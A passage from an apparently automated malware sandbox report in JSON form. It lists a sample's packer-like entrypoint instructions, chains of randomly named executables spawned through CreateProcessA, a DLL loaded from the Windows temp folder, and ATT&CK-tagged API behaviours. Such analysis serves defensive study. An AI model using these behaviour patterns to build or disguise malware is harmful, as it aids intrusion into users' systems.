4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"24026.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"020286.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fnttpf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lpftbf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bhbtd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vtbthnv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hbrjl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bnvxpv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"CreateProcessA\" with parameter \"c:\\242680.exe\" - (UID: 00000000-00005476)\n \"8844064.exe\" called \"CreateProcessA\" with parameter \"c:\\pxjrr.exe\" - (UID: 00000000-00006120)\n \"rxvhlp.exe\" called \"CreateProcessA\" with parameter \"c:\\fbtltj.exe\" - (UID: 00000000-00003500)\n \"vldfrx.exe\" called \"CreateProcessA\" with parameter \"c:\\408822.exe\" - (UID: 00000000-00003448)\n \"408822.exe\" called \"CreateProcessA\" with parameter \"c:\\00644.exe\" - (UID: 00000000-00000828)\n \"042464.exe\" called \"CreateProcessA\" with parameter \"c:\\0806624.exe\" - (UID: 00000000-00003168)\n \"0806624.exe\" called \"CreateProcessA\" with parameter \"c:\\8024466.exe\" - (UID: 00000000-00001604)\n \"8280068.exe\" called \"CreateProcessA\" with parameter \"c:\\284486.exe\" - (UID: 00000000-00003416)\n \"fnttpf.exe\" called \"CreateProcessA\" with parameter \"c:\\020286.exe\" - (UID: 00000000-00003776)\n \"02488.exe\" called \"CreateProcessA\" with parameter \"c:\\tfjtht.exe\" - (UID: 00000000-00001332)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" loaded module \"MSVCRT.DLL\" at base 75e80000\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" loaded module \"SHLWAPI.DLL\" at base 75f30000\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" loaded module \"USER32.DLL\" at base 75a20000\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"242680.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"242680.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"242680.exe\" loaded module \"KERNEL32\" at base 75940000\n \"242680.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"242680.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"26802.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"26802.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"26802.exe\" loaded module \"KERNEL32\" at base 75940000\n \"26802.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"26802.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"xrnbdjd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"xrnbdjd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xrnbdjd.exe\" loaded module \"KERNEL32\" at base 75940000\n \"xrnbdjd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xrnbdjd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"xrnbdjd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"jrfxlf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"jrfxlf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jrfxlf.exe\" loaded module \"KERNEL32\" at base 75940000\n \"jrfxlf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jrfxlf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"8844064.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"8844064.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8844064.exe\" loaded module \"KERNEL32\" at base 75940000\n \"8844064.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8844064.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"8844064.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"pxjrr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"pxjrr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pxjrr.exe\" loaded module \"KERNEL32\" at base 75940000\n \"pxjrr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pxjrr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"bnjjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"bnjjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bnjjv.exe\" loaded module \"KERNEL32\" at base 75940000\n \"bnjjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bnjjv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"bnjjv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"626400.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"626400.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"626400.exe\" loaded module \"KERNEL32\" at base 75940000\n \"626400.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"880202.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"880202.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"880202.exe\" loaded module \"KERNEL32\" at base 75940000\n \"880202.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"880202.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"nvrtbh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"nvrtbh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nvrtbh.exe\" loaded module \"KERNEL32\" at base 75940000\n \"nvrtbh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nvrtbh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"dppbn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"dppbn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dppbn.exe\" loaded module \"KERNEL32\" at base 75940000\n \"dppbn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dppbn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"dppbn.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"xvnnn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"xvnnn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xvnnn.exe\" loaded module \"KERNEL32\" at base 75940000\n \"xvnnn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xvnnn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"xvnnn.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"ftvfbtx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"rxvhlp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"fbtltj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"fbtltj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fbtltj.exe\" loaded module \"KERNEL32\" at base 75940000\n \"fbtltj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fbtltj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"fbtltj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"0064284.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"0080208.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"0080208.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0080208.exe\" loaded module \"KERNEL32\" at base 75940000\n \"0080208.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0080208.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"thntdfd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"thntdfd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"thntdfd.exe\" loaded module \"KERNEL32\" at base 75940000\n \"thntdfd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"thntdfd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"xxlthnt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"xxlthnt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xxlthnt.exe\" loaded module \"KERNEL32\" at base 75940000\n \"xxlthnt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xxlthnt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"vldfrx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"vldfrx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vldfrx.exe\" loaded module \"KERNEL32\" at base 75940000\n \"vldfrx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vldfrx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"vldfrx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"408822.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"4288806.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"4288806.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4288806.exe\" loaded module \"KERNEL32\" at base 75940000\n \"4288806.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"604420.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"042464.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"0806624.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"8024466.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"8024466.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8024466.exe\" loaded module \"KERNEL32\" at base 75940000\n \"8024466.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8024466.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"4640626.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"xrfpvx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"xrfpvx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xrfpvx.exe\" loaded module \"KERNEL32\" at base 75940000\n \"xrfpvx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0824600.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"0824600.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0824600.exe\" loaded module \"KERNEL32\" at base 75940000\n \"0824600.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0824600.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"0824600.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"8280068.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"8280068.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8280068.exe\" loaded module \"KERNEL32\" at base 75940000\n \"8280068.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8280068.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"8280068.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"284486.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"284486.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"284486.exe\" loaded module \"KERNEL32\" at base 75940000\n \"284486.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"284486.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"4088420.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"4088420.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4088420.exe\" loaded module \"KERNEL32\" at base 75940000\n \"4088420.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6466820.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"6466820.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6466820.exe\" loaded module \"KERNEL32\" at base 75940000\n \"6466820.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6466820.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"6466820.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"ntnbrnr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"ntnbrnr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ntnbrnr.exe\" loaded module \"KERNEL32\" at base 75940000\n \"ntnbrnr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ntnbrnr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"bnvxpv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"hbrjl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"hbrjl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hbrjl.exe\" loaded module \"KERNEL32\" at base 75940000\n \"hbrjl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hbrjl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"bhbtd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"bhbtd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bhbtd.exe\" loaded module \"KERNEL32\" at base 75940000\n \"bhbtd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bhbtd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"lpftbf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"lpftbf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lpftbf.exe\" loaded module \"KERNEL32\" at base 75940000\n \"lpftbf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lpftbf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"fnttpf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"fnttpf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fnttpf.exe\" loaded module \"KERNEL32\" at base 75940000\n \"fnttpf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fnttpf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000\n \"24026.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"24026.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24026.exe\" loaded module \"KERNEL32\" at base 75940000\n \"24026.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24026.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"02488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70940000\n \"02488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02488.exe\" loaded module \"KERNEL32\" at base 75940000\n \"02488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02488.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cdc0000\n \"02488.exe\" loaded module \"KERNEL32.DLL\" at base 75940000\n \"02488.exe\" loaded module \"MSVCRT.DLL\" at base 75e80000\n \"02488.exe\" loaded module \"SHLWAPI.DLL\" at base 75f30000\n \"02488.exe\" loaded module \"USER32.DLL\" at base 75a20000\n \"02488.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75280000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee26b@ADVAPI32.dll\"\n \"0e000f00703fe26b@ADVAPI32.dll\"\n \"0e000f00cc3fe26b@ADVAPI32.dll\"\n \"11001200b447e26b@ADVAPI32.dll\"\n \"110012004848e26b@ADVAPI32.dll\"\n \"120013008c48e26b@ADVAPI32.dll\"\n \"12001300e448e26b@ADVAPI32.dll\"\n \"14001500386ee26b@ADVAPI32.dll\"\n \"14001500506ee26b@ADVAPI32.dll\"\n \"14001500686ee26b@ADVAPI32.dll\"\n \"17001800806ee26b@ADVAPI32.dll\"\n \"0d000e00986ee26b@ADVAPI32.dll\"\n \"11001200a86ee26b@ADVAPI32.dll\"\n \"11001200bc6ee26b@ADVAPI32.dll\"\n \"0f001000fc6fe26b@ADVAPI32.dll\"\n \"140015003c70e26b@ADVAPI32.dll\"\n \"140015005470e26b@ADVAPI32.dll\"\n \"0c000d009c70e26b@ADVAPI32.dll\"\n \"0c000d00ac70e26b@ADVAPI32.dll\"\n \"0e000f00bc70e26b@ADVAPI32.dll\"\n \"0e000f00cc70e26b@ADVAPI32.dll\"\n \"0b000c00dc70e26b@ADVAPI32.dll\"\n \"180019001473e26b@RPCRT4.dll\"\n \"130014004073e26b@RPCRT4.dll\"\n \"140015005473e26b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005476)\n \"242680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005352)\n \"242680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005352)\n \"242680.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005352)\n \"242680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005352)\n \"26802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004268)\n \"26802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004268)\n \"26802.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004268)\n \"26802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004268)\n \"xrnbdjd.exe\" called 